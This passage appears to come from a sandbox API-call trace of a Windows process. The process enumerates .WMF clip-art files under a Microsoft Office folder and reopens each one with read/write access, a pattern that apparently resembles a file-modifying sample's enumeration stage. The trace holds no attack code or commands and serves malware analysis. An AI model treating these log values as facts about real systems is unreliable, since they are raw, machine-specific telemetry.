Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.396] AreFileApisANSI () returned 1 [0104.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.396] GetFileType (hFile=0x27c) returned 0x1 [0104.396] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.396] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.396] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.396] CloseHandle (hObject=0x27c) returned 1 [0104.396] AreFileApisANSI () returned 1 [0104.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.397] GetFileType (hFile=0x27c) returned 0x1 [0104.397] CloseHandle (hObject=0x27c) returned 1 [0104.397] AreFileApisANSI () returned 1 [0104.397] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3df0)) returned 1 [0104.397] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc7b993, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4712, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00297_.WMF", cAlternateFileName="")) returned 1 [0104.397] AreFileApisANSI () returned 1 [0104.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.397] AreFileApisANSI () returned 1 [0104.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.397] GetFileType (hFile=0x27c) returned 0x1 [0104.397] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.397] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.397] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.398] CloseHandle (hObject=0x27c) returned 1 [0104.398] AreFileApisANSI () returned 1 [0104.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.398] GetFileType (hFile=0x27c) returned 0x1 [0104.398] CloseHandle (hObject=0x27c) returned 1 [0104.398] AreFileApisANSI () returned 1 [0104.398] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc7b993, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4712)) returned 1 [0104.398] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb6de, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00306_.WMF", cAlternateFileName="")) returned 1 [0104.398] AreFileApisANSI () returned 1 [0104.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.398] AreFileApisANSI () returned 1 [0104.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.398] GetFileType (hFile=0x27c) returned 0x1 [0104.399] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.399] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.399] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.399] CloseHandle (hObject=0x27c) returned 1 [0104.399] AreFileApisANSI () returned 1 [0104.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.399] GetFileType (hFile=0x27c) returned 0x1 [0104.399] CloseHandle (hObject=0x27c) returned 1 [0104.399] AreFileApisANSI () returned 1 [0104.399] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb6de)) returned 1 [0104.399] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00336_.WMF", cAlternateFileName="")) returned 1 [0104.399] AreFileApisANSI () returned 1 [0104.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.399] AreFileApisANSI () returned 1 [0104.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.400] GetFileType (hFile=0x27c) returned 0x1 [0104.400] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.400] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.400] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.400] CloseHandle (hObject=0x27c) returned 1 [0104.401] AreFileApisANSI () returned 1 [0104.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.401] GetFileType (hFile=0x27c) returned 0x1 [0104.401] CloseHandle (hObject=0x27c) returned 1 [0104.401] AreFileApisANSI () returned 1 [0104.401] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b4)) returned 1 [0104.401] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfea, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00361_.WMF", cAlternateFileName="")) returned 1 [0104.401] AreFileApisANSI () returned 1 [0104.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.401] AreFileApisANSI () returned 1 [0104.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.401] GetFileType (hFile=0x27c) returned 0x1 [0104.402] CloseHandle (hObject=0x27c) returned 1 [0104.404] AreFileApisANSI () returned 1 [0104.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.404] GetFileType (hFile=0x27c) returned 0x1 [0104.404] CloseHandle (hObject=0x27c) returned 1 [0104.404] AreFileApisANSI () returned 1 [0104.404] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfea)) returned 1 [0104.404] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2168, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00369_.WMF", cAlternateFileName="")) returned 1 [0104.404] AreFileApisANSI () returned 1 [0104.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.404] AreFileApisANSI () returned 1 [0104.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.404] GetFileType (hFile=0x27c) returned 0x1 [0104.404] CloseHandle (hObject=0x27c) returned 1 [0104.405] AreFileApisANSI () returned 1 [0104.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.405] GetFileType (hFile=0x27c) returned 0x1 [0104.405] CloseHandle (hObject=0x27c) returned 1 [0104.405] AreFileApisANSI () returned 1 [0104.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc55757, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2168)) returned 1 [0104.405] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00382_.WMF", cAlternateFileName="")) returned 1 [0104.405] AreFileApisANSI () returned 1 [0104.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.405] AreFileApisANSI () returned 1 [0104.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.405] GetFileType (hFile=0x27c) returned 0x1 [0104.405] CloseHandle (hObject=0x27c) returned 1 [0104.405] AreFileApisANSI () returned 1 [0104.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.406] GetFileType (hFile=0x27c) returned 0x1 [0104.406] CloseHandle (hObject=0x27c) returned 1 [0104.406] AreFileApisANSI () returned 1 [0104.406] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e8)) returned 1 [0104.406] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00397_.WMF", cAlternateFileName="")) returned 1 [0104.406] AreFileApisANSI () returned 1 [0104.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.406] AreFileApisANSI () returned 1 [0104.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.406] GetFileType (hFile=0x27c) returned 0x1 [0104.406] CloseHandle (hObject=0x27c) returned 1 [0104.406] AreFileApisANSI () returned 1 [0104.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.407] GetFileType (hFile=0x27c) returned 0x1 [0104.407] CloseHandle (hObject=0x27c) returned 1 [0104.407] AreFileApisANSI () returned 1 [0104.407] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc2f4b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc2f4b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a40)) returned 1 [0104.407] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ec6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00403_.WMF", cAlternateFileName="")) returned 1 [0104.408] AreFileApisANSI () returned 1 [0104.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.408] AreFileApisANSI () returned 1 [0104.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.408] GetFileType (hFile=0x27c) returned 0x1 [0104.408] CloseHandle (hObject=0x27c) returned 1 [0104.408] AreFileApisANSI () returned 1 [0104.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.408] GetFileType (hFile=0x27c) returned 0x1 [0104.408] CloseHandle (hObject=0x27c) returned 1 [0104.409] AreFileApisANSI () returned 1 [0104.409] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ec6)) returned 1 [0104.409] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2afa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00414_.WMF", cAlternateFileName="")) returned 1 [0104.409] AreFileApisANSI () returned 1 [0104.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF", 